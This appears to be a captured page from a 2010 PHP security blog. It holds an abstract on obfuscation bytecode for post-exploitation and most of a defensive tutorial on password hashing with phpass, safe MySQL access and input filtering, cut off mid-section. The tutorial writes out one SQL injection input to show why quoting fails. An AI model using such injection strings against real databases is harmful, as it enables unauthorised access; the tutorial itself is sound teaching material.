the Month of PHP Security » Articles & Tools
http://php-security.org
"improving the security of the PHP ecosystem"

Article: Virtual Meta-Scripting Bytecode for PHP and JavaScript
http://php-security.org/2010/05/31/article-virtual-meta-scripting-bytecode-for-php-and-javascript/
Mon, 31 May 2010

As a last minute addition to the Month of PHP Security we present an article by Ben Fuhrmannek about virtual meta-scripting bytecode for PHP and JavaScript.

Ben Fuhrmannek, 2010-05-31

Abstract
Both PHP and JavaScript are frequently being targeted for exploiting web applications. This article elaborates on the idea of building a set of virtual machines on top of each programming language. As a result a single type of bytecode can be executed by both VMs. Particular emphasis is put on designing virtual machines to be most suitable for code obfuscation in a post exploitation scenario.

[PDF Article]

MOPS Submission 10: How to manage a PHP application’s users and passwords
http://php-security.org/2010/05/26/mops-submission-10-how-to-manage-a-php-applications-users-and-passwords/
Wed, 26 May 2010

It is time to present the tenth and last external MOPS submission. It is an article by Solar Designer describing at length how to manage a PHP application’s users and passwords.

How to manage a PHP application’s users and passwords


Alexander Peslyak
Founder and CTO
Openwall, Inc.


better known as


Solar Designer
Openwall Project leader

April 2010


Some rights reserved

Introduction

Almost all large PHP applications, as well as many small ones, have a notion of user accounts, and, whether we like it or not, they typically use passwords (or at best passphrases) to authenticate the users. How do they store the passwords (to authenticate against)? Reasonable applications don’t. Instead, they store password hashes. There have been many short articles, blog posts, even book chapters that try/claim to show you how to properly compute and use password hashes. Older ones will tell you to use the md5() function. Newer ones will tell you to use sha1() or hash() (SHA-256, etc.), add salting (but “forget” to add stretching, which is equally important), and use mysql_real_escape_string() on the username. Unfortunately, while some of these recommendations are steps in the right direction (although not all are), none of the articles on password security in PHP that I saw were “quite it”.

Finally, some of the more recent blog posts, forum comments, and the like have started to recommend phpass, the password/passphrase hashing framework for PHP that I wrote, and which has already been integrated into many popular “web applications” including phpBB3, WordPress, and Drupal 7. Obviously, I fully agree with this recommendation. However, I was not aware of an existing step-by-step guide on integrating phpass into a PHP application, and password security is not only about password hashing anyway.

In this article/tutorial, I will guide you through the steps needed to introduce proper (in my opinion at least) user/password management into a new PHP application. I will start by briefly explaining password/passphrase hashing and how to access the database safely. Then we will proceed through several revisions of the sample program. We’ll start with a very simple PHP program capable of creating new users only and having some subtle issues. We will gradually improve this program adding functionality (logging in to existing user accounts, changing user passwords, and enforcing a password policy) and “discovering” and dealing with the issues.

We will also briefly touch on many related topics. Sub-headings have been chosen such that you may skip or skim over the topics you think you’re already familiar with… or better read those sections anyway.
Let’s get started.

Password/passphrase hashing

Decent systems/applications do not actually store users’ passwords. Instead, they transform new passwords being set/changed into password hashes with cryptographic (one-way) hash functions, and they store those hashes. They should preferably use hash functions intended for password hashing. Direct/naive use of other cryptographic hash functions, such as PHP’s md5(), sha1(), or hash('sha256', …) for that matter, has dire consequences.

When a user authenticates to the application with a username and a previously-set password, the application looks up some auxiliary information (such as the hash type, the salt, and the iteration count – all of which are described below) for the provided username, transforms the provided password into its hash, and compares this hash against the one stored for the user. If the two hashes match, authentication succeeds (otherwise it fails).
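
As a rough illustration of this flow, here is a minimal sketch that uses PHP’s own crypt() directly rather than phpass. The verify_password() helper and the fixed salt are made up for the demo, and hash_equals() assumes PHP 5.6 or newer. In the sample program we will let phpass do this work instead.

```php
// Hypothetical helper (not part of phpass): check a candidate password
// against a stored crypt()-style hash encoding string.
function verify_password($candidate, $stored)
{
    // Passing the stored string as the "salt" makes crypt() reuse the
    // hash type, iteration count, and salt that are encoded in it.
    $computed = crypt($candidate, $stored);
    // On failure crypt() returns a short token such as "*0", never a full hash.
    if (!is_string($computed) || strlen($computed) < 20)
        return false;
    // Constant-time comparison (assumes PHP 5.6+ for hash_equals()).
    return hash_equals($stored, $computed);
}

// Demo only: a fixed, made-up 22-character salt. Real salts must be random.
$stored = crypt('mypass', '$2a$08$abcdefghijklmnopqrstuu');

var_dump(verify_password('mypass', $stored)); // correct password
var_dump(verify_password('wrong', $stored));  // incorrect password
```

Note that the application never needs to know the plaintext password that produced $stored. It only needs to recompute the hash under the same parameters.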

- “Why bother with password hashing when I use (or don’t use) SSL (https URLs) anyway?”

(Surprisingly, this question is really being asked both ways. More often, people would make an incorrect statement that you don’t need password hashing, or don’t need to do it right, because you do or because you don’t use SSL.)

- Password hashing, if done right, reduces the impact of having the hashes stolen or leaked: an attacker will recover fewer plaintext passwords from the hashes.

Also, the cost of recovery from an incident like this may be reduced – rather than change all passwords at once, which may be costly or prohibitive to do, a system’s administrator may audit the password hashes with a tool such as John the Ripper and only have the weak passwords changed. With proper password hashing and password policy enforcement in place, the majority of the passwords could be considered “strong enough” and would not need to be changed immediately even after a known and otherwise-resolved security compromise.

The use of SSL mitigates the risk of having some plaintext passwords captured while in transit. Clearly, these risks are different. An attacker capable of capturing some of the network traffic is not necessarily capable of getting a copy of the database, and vice versa. Thus, it makes perfect sense to use one of these countermeasures – password hashing and SSL – without the other (which does not address “the other” risk then), and it also makes sense to use both of them together.

Salting

Salts are likely-unique values that are entered into a password hashing method along with the password, which results in the same password hashing into completely different hash values given different salts. Proper use of salts may defeat a number of attacks, including:

  • Ability to try candidate passwords against multiple hashes at the price of one
  • Use of pre-hashed lists (or the smarter “rainbow tables”) of candidate passwords
  • Ability to determine whether two users (or two accounts of one user) have the same or different passwords without actually having to guess one of the passwords

Salts are normally stored along with the hashes. They are not secret.
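
To see the effect of a salt, the following sketch hashes the same password twice with PHP’s crypt() and two different salts. Both salt strings are made up and fixed only to keep the demo repeatable. This is an illustration of the idea, not how phpass generates its salts.

```php
$password = 'mypass';

// Two made-up 22-character salts, fixed here only so the demo is repeatable.
$hash1 = crypt($password, '$2a$08$abcdefghijklmnopqrstuu');
$hash2 = crypt($password, '$2a$08$ABCDEFGHIJKLMNOPQRSTUu');

// Same password, different salts: the hashes do not match.
var_dump($hash1 === $hash2); // bool(false)

// Same password, same salt: the hash is reproduced exactly.
var_dump($hash1 === crypt($password, '$2a$08$abcdefghijklmnopqrstuu')); // bool(true)
```

An attacker who has pre-hashed a list of candidate passwords without knowing these salts gains nothing from that list, and cannot tell from the two hashes alone that the passwords are equal.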

Stretching

Offline password cracking (given stolen or leaked password hashes) involves computing hashes of large numbers of candidate passwords. Thus, in order to slow those attacks down, the computational complexity of a good password hashing method must be high – but of course not so high as to render it impractical.

Typical cryptographic hash functions not intended for password hashing were designed for speed. If these are directly misused for password hashing, then offline password cracking attacks may run at speeds of many millions of candidate passwords per second.

These cryptographic hash functions (or even block ciphers) – let’s call them “cryptographic primitives” – may be used as building blocks to construct a decent password hashing method, which would use thousands or millions of iterations of the underlying cryptographic primitive. This is called password (or key) stretching (or strengthening). Preferably, the number of iterations should not be hard-coded, but rather it should be configurable by an administrator for use when a new password is set (hashed), and it should be getting saved along with the hash (to allow the administrator to change the iteration count for newly set/changed passwords, yet not break support for previously-generated password hashes).
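
The idea can be sketched with a toy scheme. Everything below is made up for illustration: the toy_stretch() function, the “toy$” string format, and the choice of SHA-256 as the primitive. It is not a vetted password hash and it is not what phpass emits; it only shows an iterated primitive with the cost saved next to the result.

```php
// Toy key stretching for illustration only. Do not use in production.
function toy_stretch($password, $salt, $cost_log2)
{
    $count = 1 << $cost_log2; // iteration count, stored as its base-2 logarithm
    $h = hash('sha256', $salt . $password, true);
    do {
        // Each round depends on the previous digest, so the rounds
        // have to be computed one after another for every guess.
        $h = hash('sha256', $h . $password, true);
    } while (--$count);
    // Keep the cost and the salt next to the hash so that old hashes stay
    // verifiable after the administrator raises the cost for new passwords.
    return 'toy$' . sprintf('%02d', $cost_log2) . '$' . $salt . '$' . bin2hex($h);
}

$old = toy_stretch('mypass', 'c2FsdA', 8);  // 256 iterations
$new = toy_stretch('mypass', 'c2FsdA', 12); // 4096 iterations
echo $old, "\n", $new, "\n";
```

Because the cost is part of the stored string, a verifier can read it back and repeat exactly the same number of iterations, whatever the current default happens to be.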

- “My web application must be fast. I can’t afford to use a slow hash function!”

- Actually, you can. No one said it should be taking an entire second to compute a password hash. Is 10 milliseconds fast enough for you? Perhaps it is, but if not you can make it 1 ms or less (which is likely way below other per-request “overhead” that your application incurs anyway) and still benefit from password stretching a lot. Please note that without any stretching a cryptographic primitive could be taking as little as some microseconds or even nanoseconds to compute (at least during an offline attack, which would use an optimal implementation). If you go from one microsecond to one millisecond, which is clearly affordable, you make offline attacks (against stolen or leaked hashes) run 1000 times slower, or you effectively stretch your users’ passwords or passphrases by about 10 bits of entropy each. That’s significant – it is roughly equivalent to each passphrase containing one additional word, without actually adding that extra word and having the users memorize it. Besides, the password hash is typically only computed when a user logs in (or when a new user is registered or a password is changed), which occurs relatively infrequently (compared to the frequency of other requests). Subsequent requests by the logged in user will use a session ID instead.
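
The “about 10 bits” figure is simply the base-2 logarithm of the slowdown factor. A small sketch of that arithmetic follows; stretch_bits() is a name invented here.

```php
// Extra bits of effective entropy gained by making each guess
// $slowdown_factor times more expensive for the attacker.
function stretch_bits($slowdown_factor)
{
    return log($slowdown_factor, 2);
}

printf("%.2f\n", stretch_bits(1000));   // 1 microsecond -> 1 millisecond: 9.97
printf("%.2f\n", stretch_bits(1 << 8)); // 256 iterations of a primitive: 8.00
```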

Choice of the underlying cryptographic primitive

The choice of the underlying cryptographic primitive – such as MD5, SHA-1, SHA-256, or even Blowfish or DES (which are block ciphers, yet they may be used to construct one-way hashes) – does not matter all that much. It’s the higher-level password hashing method, employing salting and stretching, that makes a difference.

- “I heard that MD5 has been “broken”. Shouldn’t we use SHA-1 instead?”

- It is true that MD5 has been broken with respect to certain attacks (practical ones). SHA-1 has also been broken in certain other ways (mostly theoretical). However, neither break has anything to do with the uses of these functions for password hashing, especially not as building blocks in a higher-level hashing method. Thus, any possible reasons to move off MD5 or SHA-1 as underlying cryptographic primitives for password hashing “because of the break” are purely “political” rather than technical.

(It may be easier to just phase out MD5 and SHA-1 rather than differentiate their affected vs. unaffected uses.)

phpass – the password/passphrase hashing framework for PHP applications

phpass provides an easy to use abstraction layer on top of PHP’s cryptographic hash functions suitable for password hashing. As of this writing, it supports three password hashing methods, including two via PHP’s crypt() function – these are known in PHP as CRYPT_BLOWFISH and CRYPT_EXT_DES – and one implemented in phpass itself on top of MD5. All three employ salting, stretching, and variable iteration counts (configurable by an administrator, encoded/stored along with the hashes).

PHP 5.3.0 and above is guaranteed to support all three of these hashing methods due to code included into the PHP interpreter itself. Specific builds/installs of older versions of PHP may or may not support the CRYPT_BLOWFISH and CRYPT_EXT_DES methods – this is system-specific. For example, the Suhosin PHP security hardening patch, included into many distributions’ packages of PHP, has been adding support for CRYPT_BLOWFISH for years. Many operating systems – such as *BSD’s, Solaris 10, SUSE Linux, ALT Linux, and indeed Openwall GNU/*/Linux – also provide support for CRYPT_BLOWFISH via the system libraries (which PHP uses), and some operating systems – *BSD’s, Openwall GNU/*/Linux – also provide support for CRYPT_EXT_DES.

The MD5-based salted and stretched hashing implemented in phpass itself is supported on all systems – starting with the ancient PHP 3. phpass provides a way for you (the application developer or administrator) to force the use of these “portable” hashes – this is a Boolean parameter to the PasswordHash constructor function.

Unless you force the use of “portable” hashes, phpass’ preferred hashing method is CRYPT_BLOWFISH, with a fallback to CRYPT_EXT_DES, and then a final fallback to the “portable” hashes. CRYPT_BLOWFISH and CRYPT_EXT_DES are preferred primarily for the efficiency of the underlying implementations (in C and on some systems in assembly), compared to phpass’ own code around MD5 (in PHP, even though the underlying MD5 code is in C). This greater code efficiency allows for more extensive and thus more effective use of password stretching (higher iteration counts).

(It is assumed that an attacker would have a near-optimal implementation of any of these hashing methods anyway.)

Besides the actual hashing, phpass transparently generates random salts when a new password or passphrase is hashed, and it encodes the hash type, the salt, and the password stretching iteration count into the “hash encoding string” that it returns. When phpass authenticates a password or passphrase against a stored hash, it similarly transparently extracts and uses the hash type identifier, the salt, and the iteration count out of the “hash encoding string”. Thus, you do not need to bother with salting and stretching on your own – phpass takes care of these for you.
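
To make the “hash encoding string” less abstract, here is a sketch that splits a CRYPT_BLOWFISH string into its parts. The parse_bcrypt_encoding() helper is hypothetical and exists only for this illustration (phpass and crypt() do this parsing internally). The sample string is the one that appears in the test output later in this article.

```php
// Hypothetical helper: split a CRYPT_BLOWFISH hash encoding string into parts.
// Returns null if the string does not look like such an encoding.
function parse_bcrypt_encoding($encoded)
{
    $pattern = '/^\$(2[axy])\$(\d\d)\$([.\/A-Za-z0-9]{22})([.\/A-Za-z0-9]{31})$/';
    if (!preg_match($pattern, $encoded, $m))
        return null;
    return array(
        'type'       => $m[1],             // hash type identifier
        'cost_log2'  => (int)$m[2],        // base-2 logarithm of the iteration count
        'iterations' => 1 << (int)$m[2],
        'salt'       => $m[3],             // 22 characters of encoded salt
        'hash'       => $m[4],             // 31 characters of encoded hash
    );
}

$parts = parse_bcrypt_encoding(
    '$2a$08$Lg5XF1Tt.X5TGyfb43vBBeEFZm4GTXQhKQ6SY6emkcnhAGT8KfxFS');
print_r($parts);
```

For the sample string this yields type 2a, a cost of 8 (that is, 256 iterations), the salt Lg5XF1Tt.X5TGyfb43vBBe, and the remaining 31 characters as the hash proper.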

- “What source of randomness does phpass use? Does it work on Windows?”

- You might have noticed that phpass uses /dev/urandom, which is a decent supply of randomness on modern Unix-like systems. However, phpass will transparently fall back to its own pseudo-random byte stream generator (which is based primarily on multiple measurements of the current time with up to microsecond precision) when /dev/urandom is unavailable or when it fails. Thus, yes, phpass works on Windows (as well as on Unix-like systems indeed).

Naturally, we’ll use phpass for our sample program.

The database (and how to access it safely)

SQL injections

What SQL injections are

In many cases, we will need to pass pieces of untrusted user input into SQL queries. Even with our trivial database and the initial revision of our user management program (which we’ll create soon), there will be untrusted user input: the username and password (or passphrase), at least before we’ve verified them. If we blindly embed the target username string obtained via a website form into an SQL query string, we might alter the SQL query. Since the username is under a potential attacker’s control, the attacker may be able to alter our SQL query in a way such that another valid SQL query of the attacker’s choice is formed. This may allow the attacker not only to circumvent our program’s intended behavior (e.g., have it change another user’s password with that altered query), but also to mount all sorts of attacks on the SQL server, as well as on our program (such as via query results that would suddenly become fully untrusted input as well).

How to deal with SQL injections

- “Can’t we just enclose the user inputs in single quotes when embedding them in an SQL query string? Wouldn’t that do the trick?”

- No. One of the input values can simply close the quotes, braces, etc., do its dirty deed, then provide additional SQL statements (or whatever) to make the rest of the original query “complete” (avoiding a syntax error). Thus, this naive approach alone does not work at all.
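
A short sketch makes this concrete. It only builds the query string and prints it, so no database is needed. The input value is a made-up example of what an attacker might type into the username field.

```php
// Untrusted input, as an attacker might submit it in the username field
$user = "x' OR '1'='1";

// Naive approach: wrap the value in single quotes and concatenate
$query = "SELECT pass FROM users WHERE user='" . $user . "'";

echo $query, "\n";
// SELECT pass FROM users WHERE user='x' OR '1'='1'
```

The input closed our opening quote, added a condition of its own, and left the query syntactically complete by reusing our closing quote.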

There are several real ways to combat SQL injections, of varying effectiveness and with different pros and cons. Most of these can be used together for greater assurance.

  • Filtering – sanitize the input values rejecting or modifying “bad” ones (preferably using a whitelist of known-safe input values rather than a blacklist of known-unsafe ones)
  • Escaping – prefix any special characters (most notably the single quote character) with an escape character (preferably using the API functions specific to the target SQL server type)
  • Encoding – turn any input strings into other strings consisting of safe characters only – e.g., an application may introduce ‘%’ as its own escape character, then URL-encode all characters not from a known-safe set (the ‘%’ character has a special meaning in certain contexts, though, so you might choose another or you might only use this technique along with escaping)
  • Prepared statements – rather than form SQL query strings with inputs embedded into them (in one way or another), an application may use advanced APIs to pass SQL queries with placeholders to the SQL server and then pass the input values to the SQL server “separately”

In the sample program that we’ll be writing during the rest of this article, we’ll use filtering (the “rejection” kind of it) and prepared statements in such a way that if any one of these techniques fails to provide its security, the application will nevertheless remain secure.

Prepared statements with PHP and MySQL

As of this writing, PHP offers three main interfaces to MySQL: PHP’s MySQL Extension (obsolete, not recommended for new projects – but still widely used), PHP’s mysqli (MySQL Improved) Extension (“preferred” for new projects), and PHP Data Objects (PDO) (recommended, but not “preferred” for new projects). The last two of these support prepared statements. Both require PHP 5+. We’ll use mysqli.

The separation of code and data achieved with the mysqli PHP extension, the underlying MySQL APIs that it uses, and the (relatively) new MySQL protocol revision can’t be perfect – everything is sent over the same socket connection anyway – but it does appear to be way better (simpler, and hence less error-prone) than what could be achieved by escaping. Specifically, in the MySQL binary protocol, the input values are preceded by binary representations of their lengths in bytes and then are sent verbatim.
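
The following is a deliberately simplified model of that idea, not the actual MySQL wire format (which has more to it, such as type information and multi-byte length encodings). The length_prefixed() function is invented for this sketch and handles short values only.

```php
// Simplified sketch: send a value as "one length byte, then the raw bytes".
// The receiver knows exactly where the value ends, so quote characters
// inside it are just data and cannot terminate anything.
function length_prefixed($value)
{
    $len = strlen($value);
    if ($len >= 251)
        throw new InvalidArgumentException('this sketch handles short values only');
    return chr($len) . $value;
}

$wire = length_prefixed("x' OR '1'='1");
echo ord($wire[0]), "\n";    // 12, the number of bytes that follow
echo substr($wire, 1), "\n"; // the value itself, sent verbatim
```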

Beware: apparently, certain interfaces and older/transitional software versions emulate prepared statements on the client end, which makes them susceptible to the risks typical for SQL escaping. This is one of the reasons why we choose not to rely on prepared statements alone for security against SQL injections.

Employ the principle of least privilege

Besides avoiding SQL injections, it makes sense to mitigate any that would potentially occur anyway, as well as possibly some other attacks carried out against or via the database. To this end, it is a good idea to have your PHP application use an SQL server account with the minimum privileges required – not an administrative account and not an account that can also access another database.

This also helps in case your PHP application is somehow fully compromised, such that the attacker gains direct access to the database with the application’s access privileges, yet you care not to let this compromise directly “propagate” onto other databases that your application does not use.

Schema

For our sample program, we’ll start with just one table in a brand new MySQL database. Connect to the MySQL server (such as with the command-line mysql client program) and issue the following:

create database myapp;
use myapp;
create table users (user varchar(60), pass varchar(60));


(We will need to revise this a little bit to deal with an issue that we’ll “discover” further down this article.)

The user column will hold usernames, and the pass column will hold password hashes. Currently, phpass produces hash encoding strings that are at most 60 characters long.

The sample program is born

The code snippets included in this article generally assume that you’re familiar with creating HTML web pages and PHP scripts. Thus, any opening and closing tags (such as <html> and <?php), etc. are omitted from here, to keep the article from growing too long. However, the sample files in the archive provided with the article do include all of those essential bits.

How to create new users

First, we need to put the phpass code in place. (We will use it to hash the new password.) We place the PasswordHash.php file from the phpass distribution tarball somewhere within our web “virtual host” “document root” directory and we set proper permissions for the file to be loaded by the web server’s PHP setup (typically, the Unix permission bits will need to be 600 or 644 depending on web server setup).

Then we create a subdirectory for our sample program (this is how multiple revisions of the program are included in the archive accompanying this article – in separate subdirectories). Let’s call the directory demo (and set its Unix permissions to 711). We’ll place two files into this directory: user-man.html (with permissions set to 644) containing the HTML form below, and user-man.php (with permissions set the same as we did for PasswordHash.php).

Let’s place the following HTML form into user-man.html:

<form action="user-man.php" method="POST">
Username:<br>
<input type="text" name="user" size="60"><br>
Password:<br>
<input type="password" name="pass" size="60"><br>
<input type="submit" value="Create user">
</form>

This form asks for and submits a username and a password to the user-man.php script. Let’s start writing it. First, let’s include the phpass code:

require '../PasswordHash.php';

To actually use phpass, we need to decide on and specify the extent of password stretching and whether we want to force the use of “portable” hashes or not (both of these matters were briefly discussed above). Let’s place those constants into PHP variables:

// Base-2 logarithm of the iteration count used for password stretching
$hash_cost_log2 = 8;
// Do we require the hashes to be portable to older systems (less secure)?
$hash_portable = FALSE;

(In a real application, these should be in a configuration file included from the actual program code files instead. Alternatively, they may be configurable via the application itself, by an administrative user.)

To obtain the submitted username and password, let’s initially use:

$user = $_POST['user'];
// Should validate the username length and syntax here
$pass = $_POST['pass'];

(This is a bit problematic. We will revise it soon.)

Now we can hash the password with:

$hasher = new PasswordHash($hash_cost_log2, $hash_portable);
$hash = $hasher->HashPassword($pass);
if (strlen($hash) < 20)
    fail('Failed to hash new password');
unset($hasher);

This uses the fact that the shortest valid password hash encoding string that phpass can currently return is 20 characters long (this is the case for CRYPT_EXT_DES, whereas other hash types use even longer encoding strings). fail() is a custom function that we’ll use in our sample program. Let’s define it (earlier in the code) as follows:

function fail($pub, $pvt = '')
{
    $msg = $pub;
    if ($pvt !== '')
        $msg .= ": $pvt";
    exit("An error occurred ($msg).\n");
}

(This function as defined above is a bit problematic. We will revise it soon.)

Note that we don’t bother producing proper HTML output in fail(). For our sample program, it is simpler to produce plain text output. Let’s set the HTTP header accordingly such that the web browser does not attempt to parse our script’s output as HTML:

header('Content-Type: text/plain');

Indeed, we need to do this before our script possibly produces any output.

(In a real PHP application, you would likely be producing HTML output instead, which requires more code and extra safety measures.)

Let’s also place our database access credentials into PHP variables. For example:

// In a real application, these should be in a config file instead
$db_host = '127.0.0.1';
$db_port = 3306;
$db_user = 'mydbuser';
$db_pass = 'voulDyu0gue$s?';
$db_name = 'myapp';

Let’s connect to the database using mysqli, and let’s not forget to check for a possible failure:

$db = new mysqli($db_host, $db_user, $db_pass, $db_name, $db_port);
if (mysqli_connect_errno())
    fail('MySQL connect', mysqli_connect_error());

Finally, let’s try to create the user by inserting the username and the password hash encoding string (which includes the salt, etc.) into the database table using the prepared statements API:

($stmt = $db->prepare('insert into users (user, pass) values (?, ?)'))
    || fail('MySQL prepare', $db->error);
$stmt->bind_param('ss', $user, $hash)
    || fail('MySQL bind_param', $db->error);
$stmt->execute()
    || fail('MySQL execute', $db->error);

If we got this far, we must have successfully created the user. Let’s close the database connection:

$stmt->close();
$db->close();

In fact, it would be nice to do this on failure as well, but that would make the code more complicated (the cleanups to perform would vary depending on where the failure occurs). Instead, we rely on the web server setup to perform any cleanups for terminating PHP scripts, which it needs to do anyway because scripts may sometimes terminate abnormally.

So that’s it. Please find the HTML file and the demo program we’ve just created, complete with all details and with the snippets in the proper order (unlike in this article), in the demo1 subdirectory in the accompanying archive (tar.gz, ZIP).

Let’s test the program. Go to the URL for the user-man.html HTML page in a web browser, enter myuser for the username and mypass for the password. If the script completes without error, we should be able to see the new user account in the users table:

mysql> select * from users;
+--------+--------------------------------------------------------------+
| user   | pass                                                         |
+--------+--------------------------------------------------------------+
| myuser | $2a$08$Lg5XF1Tt.X5TGyfb43vBBeEFZm4GTXQhKQ6SY6emkcnhAGT8KfxFS |
+--------+--------------------------------------------------------------+
1 row in set (0.00 sec)

The password hash will look almost completely different, though, due to the random salt and due to the hash possibly being of a different type (if you’re using PHP older than 5.3.0 and your build of PHP does not include the Suhosin patch and your operating system does not provide native support for CRYPT_BLOWFISH hashes… or if you edited the code to set $hash_portable to TRUE).

What if the user already exists?

Let’s try to create the same user, with the same username, once again. Also enter the same password, just for kicks. The script succeeds again, and we get:

mysql> select * from users;
+--------+--------------------------------------------------------------+
| user   | pass                                                         |
+--------+--------------------------------------------------------------+
| myuser | $2a$08$Lg5XF1Tt.X5TGyfb43vBBeEFZm4GTXQhKQ6SY6emkcnhAGT8KfxFS |
| myuser | $2a$08$7lM07FwQMm5/C8G/urT4z..MudfsS227e8oUEu6T51bNWk/RG//qe |
+--------+--------------------------------------------------------------+
2 rows in set (0.00 sec)

We get a duplicate user record. We’ll need to address this shortcoming. Meanwhile, notice how the hash encoding string is indeed almost entirely different, as explained above, even though the same password was supplied.

We could issue a SELECT query to see if the username is already taken before trying to create the user. However, this would involve a race condition: a simultaneous request to our script could create a user of that name after our SELECT query but before we do the INSERT. Then we would end up creating a duplicate user record anyway.

To deal with this, we need to revise our database schema such that the MySQL server would not permit duplicate usernames:

DROP TABLE users;
CREATE TABLE users (user varchar(60), pass varchar(60), UNIQUE (user));

Now let’s repeat the experiment: create the same user twice via our web form. On our second attempt to create the user, the script fails with:

An error occurred (MySQL execute: Duplicate entry 'myuser' for key 1).

Checking the table contents, we see that only one instance of the user was created – just like we wanted. The message printed on an attempt to create a duplicate user is technical, though – not one suitable for an end user. We’ll deal with this a bit later. Meanwhile, let’s focus on another aspect of it.

Avoid leaking server setup details

A portion of the error message above was produced by MySQL. On another occasion, it could possibly produce a message leaking the details of your setup – such as the database name, the database server address, and/or a full pathname to a database table file. We would want to avoid displaying this information to the user, unless we’re “the user” and we’re debugging. Also, those error messages may happen to contain characters that would need to be quoted if we were producing HTML output. Let’s modify the fail() function to support a non-debugging mode where it would not reveal the potentially-sensitive messages. Also, let’s add a comment about the “HTML issue”, such that it is hopefully not overlooked if this code is actually made to produce HTML output later.

// Are we debugging this code?  If enabled, OK to leak server setup details.
$debug = TRUE;

function fail($pub, $pvt = '')
{
    global $debug;
    $msg = $pub;
    if ($debug && $pvt !== '')
        $msg .= ": $pvt";
/* The $pvt debugging messages may contain characters that would need to be
 * quoted if we were producing HTML output, like we would be in a real app,
 * but we're using text/plain here.  Also, $debug is meant to be disabled on
 * a "production install" to avoid leaking server setup details. */

    exit("An error occurred ($msg).\n");
}

Please note that similar potential leaks of server setup details typically exist in the default settings of Apache and PHP. As an application developer, our responsibility here is to provide a way to avoid those leaks – which we did by introducing the $debug setting. It is up to a server administrator (or someone installing our PHP application on a server) to decide on and configure those settings in a certain way. It is a good idea to document the issue and the settings prominently. Also, it may be desirable to use safe defaults – that is, have $debug default to FALSE in our case. However, for our sample program we’ll continue with a default of TRUE.

How to differentiate MySQL errors

We’d like to determine if the requested username is already taken – and show a user-friendly message if so. However, the attempt to add a user could fail for other reasons as well, so it would be wrong to show the same user-friendly message on all errors.

One of the approaches would be to issue a SELECT query on the username after an attempt to add the user fails. If the SELECT query returns 1 row, then the username is definitely already taken. We can implement this as follows:

if (!$stmt->execute()) {
    $save_error = $db->error;
    $stmt->close();

    // Does the user already exist?
    ($stmt = $db->prepare('select user from users where user=?'))
        || fail('MySQL prepare', $db->error);
    $stmt->bind_param('s', $user)
        || fail('MySQL bind_param', $db->error);
    $stmt->execute()
        || fail('MySQL execute', $db->error);
    $stmt->store_result()
        || fail('MySQL store_result', $db->error);

    if ($stmt->num_rows === 1)
        fail('This username is already taken');
    else
        fail('MySQL execute', $save_error);
}

This works, and it might be the most reliable and portable approach. However, there is a shortcut: the MySQL server returns a very specific error code when the error is an attempt to create a duplicate user record. If we aren’t too concerned about a possible change in MySQL’s error codes in a future version of it, then we can simply check for the known error code. Even if this stops working, the only impact will be a less friendly message displayed to the user.

if (!$stmt->execute()) {
    if ($db->errno === 1062 /* ER_DUP_ENTRY */)
        fail('This username is already taken');
    else
        fail('MySQL execute', $db->error);
}

We will be using this shortcut approach in further revisions of the sample program.

The “Magic Quotes” issue

Magic Quotes is a deprecated feature of PHP. When enabled, which it is on many web servers, the PHP interpreter will automagically escape many inputs to PHP scripts. This may be desirable to provide some minimal security for poorly-written PHP scripts that fail to defend themselves against SQL injections, but with properly-written PHP scripts this feature may actually be more of a problem.

Specifically, unless we deal with this issue, a password containing the single quote character might or might not reach our PHP application with the character escaped. If the magic_quotes_gpc PHP setting is then toggled, or if our PHP application install is moved to another system where this setting is set differently, the password will stop working.

Thus, we need to check whether magic_quotes_gpc was set and undo its effect at least for specific inputs where this matters. Here’s the code:

function get_post_var($var)
{
    $val = $_POST[$var];
    if (get_magic_quotes_gpc())
        $val = stripslashes($val);
    return $val;
}

We’ll use this function instead of direct reads from $_POST[].

Input filtering

Let’s sanitize our inputs in order to mitigate some obscure DoS attacks, as well as not to rely on our use of prepared statements alone to prevent SQL injections.

$user = get_post_var('user');
/* Sanity-check the username, don't rely on our use of prepared statements
 * alone to prevent attacks on the SQL server via malicious usernames. */

if (!preg_match('/^[a-zA-Z0-9_]{1,60}$/', $user))
    fail('Invalid username');

$pass = get_post_var('pass');
/* Don't let them spend more of our CPU time than we were willing to.
 * Besides, bcrypt happens to use the first 72 characters only anyway. */

if (strlen($pass) > 72)
    fail('The supplied password is too long');

The sample program with all of the improvements mentioned so far is found under the demo2 subdirectory in the accompanying archive (tar.gz, ZIP).

How to authenticate existing users

Let’s enhance our sample program with support for multiple operations – initially there will be two of them: creating a new user account and logging in to an existing account. We will be passing the operation code via a hidden form field. Let’s add it into our existing form:

<input type="hidden" name="op" value="new">

And let’s add a login form:

<form action="user-man.php" method="POST">
<input type="hidden" name="op" value="login">
Username:<br>
<input type="text" name="user" size="60"><br>
Password:<br>
<input type="password" name="pass" size="60"><br>
<input type="submit" value="Log in">
</form>

Now let’s start to add support into the PHP code. First, validate the operation code:

$op = $_POST['op'];
if ($op !== 'new' && $op !== 'login')
    fail('Unknown request');

Then let’s introduce an if statement and move our new user creation code under it:

if ($op === 'new') {
    $hash = $hasher->HashPassword($pass);
    if (strlen($hash) < 20)
        fail('Failed to hash new password');
    unset($hasher);

    ($stmt = $db->prepare('insert into users (user, pass) values (?, ?)'))
        || fail('MySQL prepare', $db->error);
    $stmt->bind_param('ss', $user, $hash)
        || fail('MySQL bind_param', $db->error);
    if (!$stmt->execute()) {
        if ($db->errno === 1062 /* ER_DUP_ENTRY */)
            fail('This username is already taken');
        else
            fail('MySQL execute', $db->error);
    }

    $what = 'User created';
}

To perform user authentication, we’ll need to obtain the user’s password hash encoding string using a SELECT query for the supplied username, then use the CheckPassword() method from phpass to check the supplied password against the hash. Let’s introduce an else branch with our “login” code in it:

} else {
    $hash = '*'; // In case the user is not found
    ($stmt = $db->prepare('select pass from users where user=?'))
        || fail('MySQL prepare', $db->error);
    $stmt->bind_param('s', $user)
        || fail('MySQL bind_param', $db->error);
    $stmt->execute()
        || fail('MySQL execute', $db->error);
    $stmt->bind_result($hash)
        || fail('MySQL bind_result', $db->error);
    if (!$stmt->fetch() && $db->errno)
        fail('MySQL fetch', $db->error);

    if ($hasher->CheckPassword($pass, $hash)) {
        $what = 'Authentication succeeded';
    } else {
        $what = 'Authentication failed';
    }
    unset($hasher);
}

Finally, let’s have our script print the authentication result:

echo "$what\n";

That’s all – we can now “log in” as myuser and see the “Authentication succeeded” message. If we enter a wrong password for the user or if the target username does not exist, we see “Authentication failed”.

Please find this revision of the HTML file and the sample program in the demo3 subdirectory in the accompanying archive (tar.gz, ZIP).

How to change user passwords

Let’s introduce the proper HTML form:

<form action="user-man.php" method="POST">
<input type="hidden" name="op" value="change">
Username:<br>
